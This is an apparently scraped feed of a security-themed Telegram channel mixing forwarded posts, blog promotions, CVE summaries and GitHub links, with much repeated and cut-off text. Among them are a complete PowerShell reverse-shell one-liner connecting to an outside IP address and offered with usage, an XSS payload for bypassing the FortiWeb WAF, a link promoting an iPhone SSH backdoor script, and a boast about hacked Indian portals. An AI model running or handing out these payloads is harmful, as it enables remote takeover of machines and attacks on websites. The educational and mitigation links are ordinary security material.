Forwarded from pkg
pkg
Photo
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
❤🔥1
CYBER SECURITY ROADMAP
TIME - LIVE
COME LETS DISCUSS ABOUT FUTURE IN CYBER SECURITY
OUR WEBSITE - system32.ink
BY PROFESSIONALS
ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
TIME - LIVE
COME LETS DISCUSS ABOUT FUTURE IN CYBER SECURITY
OUR WEBSITE - system32.ink
BY PROFESSIONALS
ONLY ON THIS DISCUSSION GROUP
https://t.me/cyberdemonsD
A new blog on Digital Forensics
Learn How to use Volatility | Digital Forensics
https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/
This blog will teach you alot of new stuff about digital forensics
A beginner and don't know what exactly digital forensics?
I recommend you to go with this blog to clear your basic concepts
https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/
Join our group for more such Cyber security exclusive content
t.me/ethicalhackingtechofide
Learn How to use Volatility | Digital Forensics
https://techofide.com/blogs/what-is-digital-forensics-practical-demo-on-volatility/
This blog will teach you alot of new stuff about digital forensics
A beginner and don't know what exactly digital forensics?
I recommend you to go with this blog to clear your basic concepts
https://techofide.com/blogs/what-is-digital-forensics-how-to-use-digital-forensics-tools/
Join our group for more such Cyber security exclusive content
t.me/ethicalhackingtechofide
Forwarded from Prapatti 爪ㄚ几Ҝ
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.
Stupid backdoor!
usage:
Stupid backdoor!
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"👍4
epco-reserved-poc.dat
263 B
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options(CVE-2023-26076).
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (
The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to
The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.
🔖An “Extended protocol configuration options” message that triggers the overflow is provided in
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (
NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to
255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.
🔖An “Extended protocol configuration options” message that triggers the overflow is provided in
epco-reserved-poc.dat.🔥Exploiting aCropalypse: Recovering Truncated PNGs.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.
🔖Demo available here.
aCropalypse(CVE-2023-21036, Information disclosure in Pixel's Markup) is a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot.
🔖Demo available here.
Forwarded from ELEMENT-/-11
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from ELEMENT-/-11
Equipment's Required For Ten Year Inspection and Maintaining Egress System of Pakistan's Fighter Jet JF-17.
bypass for the FortiWeb (Fortinet) WAF
usage:
"><iframe src=//14.rs>
i.e. instead of the standard XSS payload to execute js
usage:
"><iframe src=//14.rs>
i.e. instead of the standard XSS payload to execute js
👍9
A new blog on Advance SQL Injection attacks.
Here is the link to the blog:
https://techofide.com/blogs/advanced-sql-injection-attack-sqli-blind-sql-injection-and-prevention/
If you are new and don't know what is SQL and SQLi then you can check our blog where we cover everything from scratch.
Here is the link to that blog:
https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/
Please show your support by liking the blog if you found our content helpful
Join our group for more such Cyber security content
t.me/ethicalhackingtechofide
Here is the link to the blog:
https://techofide.com/blogs/advanced-sql-injection-attack-sqli-blind-sql-injection-and-prevention/
If you are new and don't know what is SQL and SQLi then you can check our blog where we cover everything from scratch.
Here is the link to that blog:
https://techofide.com/blogs/sql-injection-attack-sqli-sql-injection-prevention-sql-injection-cheat-sheet-practical-demo/
Please show your support by liking the blog if you found our content helpful
Join our group for more such Cyber security content
t.me/ethicalhackingtechofide
Mitigating SSRF in 2023
https://ift.tt/EhW6jnc
Submitted March 21, 2023 at 08:03PM by l_tennant
via reddit https://ift.tt/2W1fGbM
https://ift.tt/EhW6jnc
Submitted March 21, 2023 at 08:03PM by l_tennant
via reddit https://ift.tt/2W1fGbM
Include Security Research Blog
Mitigating SSRF in 2023 - Include Security Research Blog
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to trick a server-side application to make a request to an unintended location. SSRF, unlike most other specific vulnerabilities, has gained its own spot on the OWASP Top 10 2021.…
👍1
CEH-Exam-Questions
Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.
https://github.com/ryh04x/CEH-Exam-Questions
#cybersecurity #infosec
Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.
https://github.com/ryh04x/CEH-Exam-Questions
#cybersecurity #infosec
iPhone-SSH-Backdoor
This is a shell script that creates an SSH backdoor on an iPhone.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#cybersecurity #infosec
This is a shell script that creates an SSH backdoor on an iPhone.
https://github.com/SleepTheGod/iPhone-SSH-Backdoor
#cybersecurity #infosec
